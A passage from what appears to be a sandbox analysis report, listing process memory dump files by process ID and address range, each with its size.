
                                                                • memory/4400-23-0x00000000070C0000-0x00000000070E2000-memory.dmp

                                                                  Filesize

                                                                  136KB

                                                                • memory/4400-20-0x0000000006150000-0x000000000616A000-memory.dmp

                                                                  Filesize

                                                                  104KB

                                                                • memory/4400-5-0x0000000004F10000-0x0000000004F76000-memory.dmp

                                                                  Filesize

                                                                  408KB

                                                                • memory/4400-17-0x0000000005C00000-0x0000000005C1E000-memory.dmp

                                                                  Filesize

                                                                  120KB

                                                                • memory/4400-16-0x0000000005730000-0x0000000005A84000-memory.dmp

                                                                  Filesize

                                                                  3.3MB

                                                                • memory/4400-2-0x00000000022D0000-0x0000000002306000-memory.dmp

                                                                  Filesize

                                                                  216KB

                                                                • memory/4400-6-0x00000000055C0000-0x0000000005626000-memory.dmp

                                                                  Filesize

                                                                  408KB

                                                                • memory/4400-22-0x0000000007160000-0x00000000071F6000-memory.dmp

                                                                  Filesize

                                                                  600KB

                                                                • memory/4400-19-0x0000000007340000-0x00000000079BA000-memory.dmp

                                                                  Filesize

                                                                  6.5MB

                                                                • memory/4476-182-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                  Filesize

                                                                  400KB

                                                                • memory/4476-181-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                  Filesize

                                                                  400KB

                                                                • memory/4528-3692-0x0000023CE8E40000-0x0000023CE8E96000-memory.dmp

                                                                  Filesize

                                                                  344KB

                                                                • memory/4528-3693-0x0000023CE8EA0000-0x0000023CE8EEC000-memory.dmp

                                                                  Filesize

                                                                  304KB

                                                                • memory/4528-876-0x0000023CE8CA0000-0x0000023CE8DAC000-memory.dmp

                                                                  Filesize

                                                                  1.0MB

                                                                • memory/4528-875-0x0000023CCFD30000-0x0000023CCFDD8000-memory.dmp

                                                                  Filesize

                                                                  672KB

                                                                • memory/4528-3706-0x0000023CE9160000-0x0000023CE91B4000-memory.dmp

                                                                  Filesize

                                                                  336KB

                                                                • memory/4640-3729-0x0000022B5BF00000-0x0000022B5BFB5000-memory.dmp

                                                                  Filesize

                                                                  724KB

                                                                • memory/4640-3734-0x0000022B5C110000-0x0000022B5C11A000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                • memory/4640-3738-0x0000022B5C160000-0x0000022B5C16A000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                • memory/4640-3737-0x0000022B5C150000-0x0000022B5C156000-memory.dmp

                                                                  Filesize

                                                                  24KB

                                                                • memory/4640-3709-0x0000022B437C0000-0x0000022B437E2000-memory.dmp

                                                                  Filesize

                                                                  136KB

                                                                • memory/4640-3728-0x0000022B43890000-0x0000022B438AC000-memory.dmp

                                                                  Filesize

                                                                  112KB

                                                                • memory/4640-3732-0x0000022B5BFC0000-0x0000022B5BFCA000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                • memory/4640-3733-0x0000022B5C130000-0x0000022B5C14C000-memory.dmp

                                                                  Filesize

                                                                  112KB

                                                                • memory/4640-3736-0x0000022B5C120000-0x0000022B5C128000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/4640-3735-0x0000022B5C170000-0x0000022B5C18A000-memory.dmp

                                                                  Filesize

                                                                  104KB

                                                                • memory/4664-138-0x00007FFB2A970000-0x00007FFB2AB65000-memory.dmp

                                                                  Filesize

                                                                  2.0MB

                                                                • memory/4664-134-0x0000000000AC0000-0x0000000000CFD000-memory.dmp

                                                                  Filesize

                                                                  2.2MB

                                                                • memory/4664-137-0x0000000072AB0000-0x0000000072AFF000-memory.dmp

                                                                  Filesize

                                                                  316KB

                                                                • memory/4664-130-0x00000000006E0000-0x000000000077E000-memory.dmp

                                                                  Filesize

                                                                  632KB

                                                                • memory/5084-582-0x0000000000400000-0x0000000000417000-memory.dmp

                                                                  Filesize

                                                                  92KB

                                                                • memory/5372-227-0x0000000072860000-0x0000000072AF1000-memory.dmp

                                                                  Filesize

                                                                  2.6MB

                                                                • memory/5372-401-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                  Filesize

                                                                  492KB

                                                                • memory/5372-297-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                  Filesize

                                                                  492KB

                                                                • memory/5372-249-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                  Filesize

                                                                  492KB

                                                                • memory/5372-230-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                  Filesize

                                                                  492KB

                                                                • memory/5372-510-0x0000000000410000-0x000000000048B000-memory.dmp

                                                                  Filesize

                                                                  492KB

                                                                • memory/5564-34761-0x0000000000E80000-0x000000000131F000-memory.dmp

                                                                  Filesize

                                                                  4.6MB

                                                                • memory/5564-3920-0x0000000000E80000-0x000000000131F000-memory.dmp

                                                                  Filesize

                                                                  4.6MB

                                                                • memory/5712-470-0x00000000008B0000-0x000000000094E000-memory.dmp

                                                                  Filesize

                                                                  632KB

                                                                • memory/5712-471-0x0000000000950000-0x0000000000B8D000-memory.dmp

                                                                  Filesize

                                                                  2.2MB

                                                                • memory/5712-472-0x0000000072FC0000-0x000000007300F000-memory.dmp

                                                                  Filesize

                                                                  316KB

                                                                • memory/5712-473-0x00007FFB2A970000-0x00007FFB2AB65000-memory.dmp

                                                                  Filesize

                                                                  2.0MB

                                                                • memory/5968-528-0x0000000000400000-0x0000000000E1A000-memory.dmp

                                                                  Filesize

                                                                  10.1MB

                                                                • memory/5968-588-0x0000000000400000-0x0000000000E1A000-memory.dmp

                                                                  Filesize

                                                                  10.1MB

                                                                • memory/6088-402-0x0000000000E80000-0x000000000131F000-memory.dmp

                                                                  Filesize

                                                                  4.6MB

                                                                • memory/6088-415-0x0000000000E80000-0x000000000131F000-memory.dmp

                                                                  Filesize

                                                                  4.6MB

                                                                • memory/6096-157-0x0000000000880000-0x000000000091E000-memory.dmp

                                                                  Filesize

                                                                  632KB

                                                                • memory/6096-161-0x0000000000920000-0x0000000000B5D000-memory.dmp

                                                                  Filesize

                                                                  2.2MB

                                                                • memory/6096-165-0x00007FFB2A970000-0x00007FFB2AB65000-memory.dmp

                                                                  Filesize

                                                                  2.0MB

                                                                • memory/6096-226-0x0000000072FC0000-0x000000007300F000-memory.dmp

                                                                  Filesize

                                                                  316KB

                                                                • memory/6096-164-0x0000000072FC0000-0x000000007300F000-memory.dmp

                                                                  Filesize

                                                                  316KB

                                                                • memory/6104-248-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                  Filesize

                                                                  400KB

                                                                • memory/6104-247-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                  Filesize

                                                                  400KB